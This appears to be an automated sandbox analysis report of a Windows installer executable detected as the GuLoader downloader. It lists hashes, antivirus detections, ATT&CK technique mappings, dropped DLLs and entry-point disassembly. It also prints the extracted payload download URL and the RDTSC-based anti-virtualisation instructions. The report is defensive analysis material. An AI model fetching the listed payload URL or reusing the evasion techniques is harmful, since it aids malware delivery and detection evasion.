
Windows Analysis Report
aSsc9zh1ex

Overview

General Information

Sample Name:aSsc9zh1ex (renamed file extension from none to exe)
Analysis ID:625008
MD5:d5e55a57372bcad45fbb260105179caf
SHA1:9b1935a927c072dd31017362ff1739bf1ea2aaf7
SHA256:3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
Tags:32exetrojan
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
PE file contains more sections than normal
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • aSsc9zh1ex.exe (PID: 4152 cmdline: "C:\Users\user\Desktop\aSsc9zh1ex.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)
  • cleanup
{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
Source | Rule | Description | Author | Strings
00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
    No Sigma rule has matched
    No Snort rule has matched


    AV Detection

    Source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
    Source: aSsc9zh1ex.exe, Virustotal: Detection: 37%
    Source: aSsc9zh1ex.exe, Metadefender: Detection: 14%
    Source: aSsc9zh1ex.exe, ReversingLabs: Detection: 34%
    Source: aSsc9zh1ex.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: aSsc9zh1ex.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_00406850 FindFirstFileW,FindClose,1_2_00406850
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C26
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_0040290B FindFirstFileW,1_2_0040290B

    Networking

    Source: Malware configuration extractor, URLs: http://barsam.com.au/bin_QuCucbUMda229.bin
    Source: aSsc9zh1ex.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056BB
    Source: aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, Binary or memory string: OriginalFilename wxbase30u_xml_gcc_custom.dll4 vs aSsc9zh1ex.exe
    Source: aSsc9zh1ex.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040350A
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_732D1BFF 1_2_732D1BFF
    Source: wxbase30u_xml_gcc_custom.dll.1.dr, Static PE information: Number of sections : 12 > 10
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Process Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File read: C:\Users\user\Desktop\aSsc9zh1ex.exe
    Source: aSsc9zh1ex.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File created: C:\Users\user\AppData\Local\Temp\nsw48CC.tmp
    Source: classification engine, Classification label: mal72.troj.evad.winEXE@1/8@0/0
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_004021AA CoCreateInstance,1_2_004021AA
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404967

    Data Obfuscation

    Source: Yara match, File source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_732D30C0 push eax; ret 1_2_732D30EE
    Source: wxbase30u_xml_gcc_custom.dll.1.dr, Static PE information: section name: .xdata
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Code function: 1_2_732D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_732D1BFF
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File created: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, RDTSC instruction interceptor: First address: 0000000002D70A78 second address: 0000000002D70A78 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FED00ACE4BAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, API call chain: ExitProcess graph end node graph_1-4642
    Source: C:\Users\user\Desktop\aSsc9zh1ex.exe, API call chain: ExitProcess graph end node graph_1-4799
    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Access Token Manipulation | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 1 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | 13 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Source | Detection | Scanner | Label
    aSsc9zh1ex.exe | 38% | Virustotal |
    aSsc9zh1ex.exe | 14% | Metadefender |
    aSsc9zh1ex.exe | 34% | ReversingLabs | Win32.Downloader.GuLoader
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll | 0% | Virustotal |
    C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | 0% | Virustotal |
    C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | 0% | Metadefender |
    C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | 0% | ReversingLabs |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
    http://barsam.com.au/bin_QuCucbUMda229.bin | 0% | Avira URL Cloud | safe
    http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
    https://sectigo.com/CPS0C | 0% | URL Reputation | safe
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://barsam.com.au/bin_QuCucbUMda229.bin | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr | false | URL Reputation: safe | unknown
    http://nsis.sf.net/NSIS_ErrorError | aSsc9zh1ex.exe | false | | high
    http://ocsp.sectigo.com0 | aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr | false | URL Reputation: safe | unknown
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr | false | URL Reputation: safe | unknown
    https://sectigo.com/CPS0C | aSsc9zh1ex.exe, 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp, wxbase30u_xml_gcc_custom.dll.1.dr | false | URL Reputation: safe | unknown
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625008
      Start date and time:2022-05-12 10:30:45 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 43s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:aSsc9zh1ex (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:17
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.evad.winEXE@1/8@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.5% (good quality ratio 84.2%)
      • Quality average: 87%
      • Quality standard deviation: 21.8%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 33
      • Number of non-executed functions: 34
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 40.125.122.176
      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
      • Not all processes were analyzed, report is missing behavior information
      No simulations
      No context
      No context
      No context
      No context
      Match | Associated Sample Name / URL | Detection
      C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll | TransportLabel_6170453602.xlsx | malicious
      C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll | OR17233976_00019489_20170619154218.xlsx | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | TransportLabel_6170453602.xlsx | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | OR17233976_00019489_20170619154218.xlsx | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | DWG-1579.exe | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | RFQ-1579.exe | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | DWG-1579.exe | malicious
      C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll | RFQ-1579.xlsx | malicious
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):60648
                      Entropy (8bit):6.273540391388373
                      Encrypted:false
                      SSDEEP:768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
                      MD5:00B917A158BB5BF0D6BFF7D6B3C81B12
                      SHA1:24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
                      SHA-256:947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
                      SHA-512:47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
                      Malicious:false
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      • Antivirus: ReversingLabs, Detection: 0%
                      Joe Sandbox View:
                      • Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse
                      • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                      Reputation:low
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):36576
                      Entropy (8bit):6.18658407883376
                      Encrypted:false
                      SSDEEP:384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
                      MD5:0B849C073801DCE25301ECA0146D534B
                      SHA1:5BB9251CA83FE96C8F52B35637E674A629ED1468
                      SHA-256:3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
                      SHA-512:1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
                      Malicious:false
                      Antivirus:
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      • Antivirus: Metadefender, Detection: 0%, Browse
                      • Antivirus: ReversingLabs, Detection: 0%
                      Joe Sandbox View:
                      • Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse
                      • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                      • Filename: DWG-1579.exe, Detection: malicious, Browse
                      • Filename: RFQ-1579.exe, Detection: malicious, Browse
                      • Filename: DWG-1579.exe, Detection: malicious, Browse
                      • Filename: RFQ-1579.xlsx, Detection: malicious, Browse
                      Reputation:low
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1070
                      Entropy (8bit):4.836891219007383
                      Encrypted:false
                      SSDEEP:24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
                      MD5:9B48061E7B9FC35CD2624F2B9102549E
                      SHA1:9DA640A8AF809549031916AB143026FAAF3B1E74
                      SHA-256:84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
                      SHA-512:01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
                      Malicious:false
                      Reputation:low
                      Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):77432
                      Entropy (8bit):6.5191464617024995
                      Encrypted:false
                      SSDEEP:1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
                      MD5:0CAED7F18389A6CC24391E0400C2BE47
                      SHA1:59288CED440D46970090F25983B409BB25F43BBF
                      SHA-256:E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
                      SHA-512:AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):288
                      Entropy (8bit):7.002703251110111
                      Encrypted:false
                      SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
                      MD5:A83F8C904AFA9E3F6A50D263747CF6DF
                      SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
                      SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
                      SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):893
                      Entropy (8bit):7.712327619290152
                      Encrypted:false
                      SSDEEP:12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
                      MD5:473EE416AF2C1AE05AA7D5D004C9B3D2
                      SHA1:EEC352E25F562C0386D5C92384A70B3005D40D6F
                      SHA-256:2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
                      SHA-512:2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
                      Malicious:false
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):12288
                      Entropy (8bit):5.814115788739565
                      Encrypted:false
                      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                      MD5:CFF85C549D536F651D4FB8387F1976F2
                      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                      Malicious:false
                      Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):214568
                      Entropy (8bit):6.30310219025288
                      Encrypted:false
                      SSDEEP:3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
                      MD5:6D01A897D44DD4D25D7E1264407210FD
                      SHA1:332C3ADE84D0C1E5BE298C037F9FE222620343B2
                      SHA-256:DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
                      SHA-512:54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
                      Malicious:false
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.537994904334399
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:aSsc9zh1ex.exe
                      File size:326847
                      MD5:d5e55a57372bcad45fbb260105179caf
                      SHA1:9b1935a927c072dd31017362ff1739bf1ea2aaf7
                      SHA256:3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
                      SHA512:088033564668a4fd3e107566387fecf0b6dcbd7a161c9ef3e4adb232520467a64af9eec740fe783d5c62fa3b79bdd910e72f3acc838e5fa155427c83003c407b
                      SSDEEP:6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
                      TLSH:07640144E6684D21FCBA0D3C0533D4A76974CC220879DBBB2BAE751A2BF51D1822FD67
                      Icon Hash:c8fbb7a7a7e3f80c
                      Entrypoint:0x40350a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A2E0h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080CCh]
                      mov esi, dword ptr [004080D0h]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007FED0073078Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007FED0073075Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [007A8B18h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx
                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d6000 | 0x15908 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x6670 | 0x6800 | False | 0.667931189904 | data | 6.43600264122 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.45 | data | 5.14577456407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0xa000 | 0x39eb78 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
